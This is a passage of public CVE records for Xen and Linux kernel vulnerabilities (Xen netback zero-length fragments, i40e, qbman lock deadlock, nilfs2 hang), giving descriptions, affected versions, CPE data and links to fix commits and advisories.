"descriptions": [
{
"lang": "en",
"value": "Transmit requests in Xen\u0027s virtual network protocol can consist of\nmultiple parts. While not really useful, except for the initial part\nany of them may be of zero length, i.e. carry no data at all. Besides a\ncertain initial portion of the to be transferred data, these parts are\ndirectly translated into what Linux calls SKB fragments. Such converted\nrequest parts can, when for a particular SKB they are all of length\nzero, lead to a de-reference of NULL in core networking code."
}
],
"impacts": [
{
"descriptions": [
{
"lang": "en",
"value": "An unprivileged guest can cause Denial of Service (DoS) of the host by\nsending network packets to the backend, causing the backend to crash.\n\nData corruption or privilege escalation have not been ruled out."
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:06:46.609Z",
"orgId": "23aa2041-22e1-471f-9209-9b7396fa234f",
"shortName": "XEN"
},
"references": [
{
"url": "https://xenbits.xenproject.org/xsa/advisory-448.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGEKT4DKSDXDS34EL7M4UVJMMPH7Z3ZZ/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "Linux: netback processing of zero-length transmit fragment",
"workarounds": [
{
"lang": "en",
"value": "Using a userspace PV network backend (e.g. the qemu based \"qnic\" backend)\nwill mitigate the problem.\n\nUsing a dedicated network driver domain per guest will mitigate the\nproblem."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "23aa2041-22e1-471f-9209-9b7396fa234f",
"assignerShortName": "XEN",
"cveId": "CVE-2023-46838",
"datePublished": "2024-01-29T10:18:48.418Z",
"dateReserved": "2023-10-27T07:55:35.332Z",
"dateUpdated": "2025-11-04T18:18:51.507Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-36020 (GCVE-0-2024-36020)
Vulnerability from cvelistv5
Published
2024-05-30 14:59
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
i40e: fix vf may be used uninitialized in this function warning
To fix the regression introduced by commit 52424f974bc5, which causes
servers hang in very hard to reproduce conditions with resets races.
Using two sources for the information is the root cause.
In this function before the fix bumping v didn't mean bumping vf
pointer. But the code used this variables interchangeably, so stale vf
could point to different/not intended vf.
Remove redundant "v" variable and iterate via single VF pointer across
whole function instead to guarantee VF pointer validity.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 76ed715836c6994bac29d9638e9314e6e3b08651 Version: e88c2a1e28c5475065563d66c07ca879a9afbd07 Version: 9abae363af5ced6adbf04c14366289540281fb26 Version: c39de3ae5075ea5f78e097cb5720d4e52d5caed9 Version: 52424f974bc53c26ba3f00300a00e9de9afcd972 Version: 52424f974bc53c26ba3f00300a00e9de9afcd972 Version: 52424f974bc53c26ba3f00300a00e9de9afcd972 Version: 52424f974bc53c26ba3f00300a00e9de9afcd972 Version: 02f949747e6fb767b29f7931d4bbf40911684e7a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36020",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-03T16:54:29.774868Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:10.052Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.504Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9dcf0fcb80f6aeb01469e3c957f8d4c97365450a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8e82128b44fa40bf99a50b919488ef361e1683c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/951d2748a2a8242853abc3d0c153ce4bf8faad31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e89846283f3cf7c7a8e28b342576fd7c561d2ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dcf573f997732702917af1563aa2493dc772fc0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06df7618f591b2dc43c59967e294d7b9fc8675b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f37c4eac99c258111d414d31b740437e1925b8e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d",
"status": "affected",
"version": "76ed715836c6994bac29d9638e9314e6e3b08651",
"versionType": "git"
},
{
"lessThan": "9dcf0fcb80f6aeb01469e3c957f8d4c97365450a",
"status": "affected",
"version": "e88c2a1e28c5475065563d66c07ca879a9afbd07",
"versionType": "git"
},
{
"lessThan": "b8e82128b44fa40bf99a50b919488ef361e1683c",
"status": "affected",
"version": "9abae363af5ced6adbf04c14366289540281fb26",
"versionType": "git"
},
{
"lessThan": "951d2748a2a8242853abc3d0c153ce4bf8faad31",
"status": "affected",
"version": "c39de3ae5075ea5f78e097cb5720d4e52d5caed9",
"versionType": "git"
},
{
"lessThan": "3e89846283f3cf7c7a8e28b342576fd7c561d2ba",
"status": "affected",
"version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
"versionType": "git"
},
{
"lessThan": "0dcf573f997732702917af1563aa2493dc772fc0",
"status": "affected",
"version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
"versionType": "git"
},
{
"lessThan": "06df7618f591b2dc43c59967e294d7b9fc8675b6",
"status": "affected",
"version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
"versionType": "git"
},
{
"lessThan": "f37c4eac99c258111d414d31b740437e1925b8e8",
"status": "affected",
"version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
"versionType": "git"
},
{
"status": "affected",
"version": "02f949747e6fb767b29f7931d4bbf40911684e7a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.264",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.223",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.153",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: fix vf may be used uninitialized in this function warning\n\nTo fix the regression introduced by commit 52424f974bc5, which causes\nservers hang in very hard to reproduce conditions with resets races.\nUsing two sources for the information is the root cause.\nIn this function before the fix bumping v didn\u0027t mean bumping vf\npointer. But the code used this variables interchangeably, so stale vf\ncould point to different/not intended vf.\n\nRemove redundant \"v\" variable and iterate via single VF pointer across\nwhole function instead to guarantee VF pointer validity."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:17.412Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d"
},
{
"url": "https://git.kernel.org/stable/c/9dcf0fcb80f6aeb01469e3c957f8d4c97365450a"
},
{
"url": "https://git.kernel.org/stable/c/b8e82128b44fa40bf99a50b919488ef361e1683c"
},
{
"url": "https://git.kernel.org/stable/c/951d2748a2a8242853abc3d0c153ce4bf8faad31"
},
{
"url": "https://git.kernel.org/stable/c/3e89846283f3cf7c7a8e28b342576fd7c561d2ba"
},
{
"url": "https://git.kernel.org/stable/c/0dcf573f997732702917af1563aa2493dc772fc0"
},
{
"url": "https://git.kernel.org/stable/c/06df7618f591b2dc43c59967e294d7b9fc8675b6"
},
{
"url": "https://git.kernel.org/stable/c/f37c4eac99c258111d414d31b740437e1925b8e8"
}
],
"title": "i40e: fix vf may be used uninitialized in this function warning",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36020",
"datePublished": "2024-05-30T14:59:44.447Z",
"dateReserved": "2024-05-17T13:50:33.157Z",
"dateUpdated": "2025-05-04T12:56:17.412Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35806 (GCVE-0-2024-35806)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
soc: fsl: qbman: Always disable interrupts when taking cgr_lock
smp_call_function_single disables IRQs when executing the callback. To
prevent deadlocks, we must disable IRQs when taking cgr_lock elsewhere.
This is already done by qman_update_cgr and qman_delete_cgr; fix the
other lockers.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: a85c525bbff4d7467d7f0ab6fed8e2f787b073d6 Version: 29cd9c2d1f428c281962135ea046a9d7bda88d14 Version: 5b10a404419f0532ef3ba990c12bebe118adb6d7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35806",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T15:22:25.715818Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:17.311Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.542Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b56a793f267679945d1fdb9a280013bd2d0ed7f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62c3ecd2833cff0eff4a82af4082c44ca8d2518a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd199e5b759ffe349622a4b8fbcafc51fc51b1ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6378314bb920acb39013051fa65d8f9f8030430"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a62168653774c36398d65846a98034436ee66d03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e6521b0f93ff350434ed4ae61a250907e65d397"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/276af8efb05c8e47acf2738a5609dd72acfc703f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af25c5180b2b1796342798f6c56fcfd12f5035bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/584c2a9184a33a40fceee838f856de3cffa19be3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/soc/fsl/qbman/qman.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b56a793f267679945d1fdb9a280013bd2d0ed7f9",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "62c3ecd2833cff0eff4a82af4082c44ca8d2518a",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "dd199e5b759ffe349622a4b8fbcafc51fc51b1ec",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "e6378314bb920acb39013051fa65d8f9f8030430",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "a62168653774c36398d65846a98034436ee66d03",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "0e6521b0f93ff350434ed4ae61a250907e65d397",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "276af8efb05c8e47acf2738a5609dd72acfc703f",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "af25c5180b2b1796342798f6c56fcfd12f5035bd",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "584c2a9184a33a40fceee838f856de3cffa19be3",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"status": "affected",
"version": "a85c525bbff4d7467d7f0ab6fed8e2f787b073d6",
"versionType": "git"
},
{
"status": "affected",
"version": "29cd9c2d1f428c281962135ea046a9d7bda88d14",
"versionType": "git"
},
{
"status": "affected",
"version": "5b10a404419f0532ef3ba990c12bebe118adb6d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/soc/fsl/qbman/qman.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.32",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.15.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoc: fsl: qbman: Always disable interrupts when taking cgr_lock\n\nsmp_call_function_single disables IRQs when executing the callback. To\nprevent deadlocks, we must disable IRQs when taking cgr_lock elsewhere.\nThis is already done by qman_update_cgr and qman_delete_cgr; fix the\nother lockers."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:48.844Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b56a793f267679945d1fdb9a280013bd2d0ed7f9"
},
{
"url": "https://git.kernel.org/stable/c/62c3ecd2833cff0eff4a82af4082c44ca8d2518a"
},
{
"url": "https://git.kernel.org/stable/c/dd199e5b759ffe349622a4b8fbcafc51fc51b1ec"
},
{
"url": "https://git.kernel.org/stable/c/e6378314bb920acb39013051fa65d8f9f8030430"
},
{
"url": "https://git.kernel.org/stable/c/a62168653774c36398d65846a98034436ee66d03"
},
{
"url": "https://git.kernel.org/stable/c/0e6521b0f93ff350434ed4ae61a250907e65d397"
},
{
"url": "https://git.kernel.org/stable/c/276af8efb05c8e47acf2738a5609dd72acfc703f"
},
{
"url": "https://git.kernel.org/stable/c/af25c5180b2b1796342798f6c56fcfd12f5035bd"
},
{
"url": "https://git.kernel.org/stable/c/584c2a9184a33a40fceee838f856de3cffa19be3"
}
],
"title": "soc: fsl: qbman: Always disable interrupts when taking cgr_lock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35806",
"datePublished": "2024-05-17T13:23:14.214Z",
"dateReserved": "2024-05-17T12:19:12.342Z",
"dateUpdated": "2025-05-04T12:55:48.844Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26696 (GCVE-0-2024-26696)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix hang in nilfs_lookup_dirty_data_buffers()
Syzbot reported a hang issue in migrate_pages_batch() called by mbind()
and nilfs_lookup_dirty_data_buffers() called in the log writer of nilfs2.
While migrate_pages_batch() locks a folio and waits for the writeback to
complete, the log writer thread that should bring the writeback to
completion picks up the folio being written back in
nilfs_lookup_dirty_data_buffers() that it calls for subsequent log
creation and was trying to lock the folio. Thus causing a deadlock.
In the first place, it is unexpected that folios/pages in the middle of
writeback will be updated and become dirty. Nilfs2 adds a checksum to
verify the validity of the log being written and uses it for recovery at
mount, so data changes during writeback are suppressed. Since this is
broken, an unclean shutdown could potentially cause recovery to fail.
Investigation revealed that the root cause is that the wait for writeback
completion in nilfs_page_mkwrite() is conditional, and if the backing
device does not require stable writes, data may be modified without
waiting.
Fix these issues by making nilfs_page_mkwrite() wait for writeback to
finish regardless of the stable write requirement of the backing device.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 Version: 1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.590Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/228742b2ddfb99dfd71e5a307e6088ab6836272e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/862ee4422c38be5c249844a684b00d0dbe9d1e46"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98a4026b22ff440c7f47056481bcbbe442f607d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e9b622bd0748cc104d66535b76d9b3535f9dc0f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8494ba2c9ea00a54d5b50e69b22c55a8958bce32"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea5ddbc11613b55e5128c85f57b08f907abd9b28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e38585401d464578d30f5868ff4ca54475c34f7d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38296afe3c6ee07319e01bb249aa4bb47c07b534"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26696",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:53.851812Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:30.066Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "228742b2ddfb99dfd71e5a307e6088ab6836272e",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "862ee4422c38be5c249844a684b00d0dbe9d1e46",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "98a4026b22ff440c7f47056481bcbbe442f607d6",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "7e9b622bd0748cc104d66535b76d9b3535f9dc0f",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "8494ba2c9ea00a54d5b50e69b22c55a8958bce32",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "ea5ddbc11613b55e5128c85f57b08f907abd9b28",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "e38585401d464578d30f5868ff4ca54475c34f7d",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
},
{
"lessThan": "38296afe3c6ee07319e01bb249aa4bb47c07b534",
"status": "affected",
"version": "1d1d1a767206fbe5d4c69493b7e6d2a8d08cc0a0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.9"
},
{
"lessThan": "3.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
